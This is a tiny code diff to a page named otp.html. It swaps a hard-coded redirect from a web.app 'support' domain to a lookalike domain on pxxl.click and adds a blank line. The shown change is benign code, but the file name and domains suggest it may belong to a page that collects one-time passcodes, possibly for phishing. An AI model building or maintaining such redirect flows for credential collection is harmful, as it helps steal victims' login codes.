--- a/otp.html
+++ b/otp.html
@@ -178,7 +178,7 @@
       });
   
       // Redirect manually
-      window.location.href = 'https://wemmaweb-support.web.app/otp.html';
+      window.location.href = 'https://webwemma-app.pxxl.click/otp.html';
     });
   </script>
 
@@ -201,5 +201,6 @@
   </script>
 
 </body>
+
 
 </html>
